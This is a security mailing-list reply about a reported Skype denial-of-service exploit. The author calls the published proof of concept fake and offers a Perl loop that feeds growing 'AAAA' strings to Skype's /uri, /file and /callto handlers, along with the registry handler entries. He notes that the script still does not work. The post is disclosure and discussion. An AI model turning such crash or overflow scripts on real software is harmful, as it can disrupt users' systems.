Re: [Full-disclosure] Skype Network Remote DoS Exploit

Valery Marchuk wrote:
Hi all!
On SecurityLab.ru forum an exploit code was published by an anonymous
user. Reportedly it must have caused Skype massive disconnections
today. The PoC uses standard Skype client to call to a specific
number. This call causes denial of service of current Skype server and
forces Skype to reconnect to another server. The new server also
"freezes" and so on ... the entire network.
Liks: http://www.securitylab.ru/news/301422.php
PoC: http://en.securitylab.ru/poc/301420.php

imho fake (the poc does nothing except looping forever, missing
execve(), exec() in place of system(), etc)

should be something like

#!/usr/bin/perl

for ($i=0;$i<(256*256);$i=$i+256) {
// ctrl + q for fast quit from skype
print "Try with $i\n";
$eot='AAAA' x $i;
$str="\"/home/p/bin/skype_static-1.4.0.74/skype\" \"/uri:$eot\"";
#$str="\"/home/p/bin/skype_static-1.4.0.74/skype\" \"/file:$eot\"";
#$str="\"/home/p/bin/skype_static-1.4.0.74/skype\" \"/callto:$eot\"";
#$str="\"/home/l/bin/skype_static-latest/skype\" \"/uri:$eot\"";
#$str="\"/usr/bin/skype\" \"/uri:$eot\"";
#$str="\"C:\\Program Files\\Skype\\Phone\\Skype.exe\" \"/uri:$eot\"";
#print($str);
system($str);
}

uri is a legit skype protocol handler

0x2,"Classes\skype\shell\open\command", "", "%SystemDrive%\Program
Files\Skype\Phone\Skype.exe" "/uri:%1"
0x1,"Classes\Skype.Content\Shell\Open\Command", "",
"%SystemDrive%\Programs\Skype\Phone\Skype.exe" "/file:%1"
0x2,"Classes\callto\shell\open\command", "",
"%SystemDrive%\Programs\Skype\Phone\Skype.exe" "/callto:%1"

but still doesn't work

Regards,
Francesco `ascii` Ongaro
http://www.ush.it/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Relevant Pages

  • Re: [Full-disclosure] Skype Network Remote DoS Exploit
    ... On Aug 17, 2007, at 8:13 AM, Valery Marchuk wrote: ... Reportedly it must have caused Skype massive disconnections today. ... The PoC uses standard Skype client to call to a specific number. ... This call causes denial of service of current Skype server and forces Skype to reconnect to another server. ...
    (Full-Disclosure)
  • [Full-disclosure] Skype Network Remote DoS Exploit
    ... Reportedly it must have caused Skype massive disconnections today. ... The PoC uses standard Skype client to call to a specific number. ... reconnect to another server. ...
    (Full-Disclosure)
  • [Full-disclosure] Skype Network Remote DoS Exploit
    ... Reportedly it must have caused Skype massive disconnections today. ... The PoC uses standard Skype client to call to a specific number. ... reconnect to another server. ...
    (Full-Disclosure)
  • Skype Network Remote DoS Exploit
    ... Reportedly it must have caused Skype massive disconnections today. ... The PoC uses standard Skype client to call to a specific number. ... This call causes denial of service of current Skype server and forces Skype to reconnect to another server. ...
    (Bugtraq)
  • RE: fedora-list Digest, Vol 30, Issue 16
    ... Which FC for a Dell poweredge server? ... Re: skype ... Intel 3945ABG Wireless ... Re: Process memory question. ...
    (Fedora)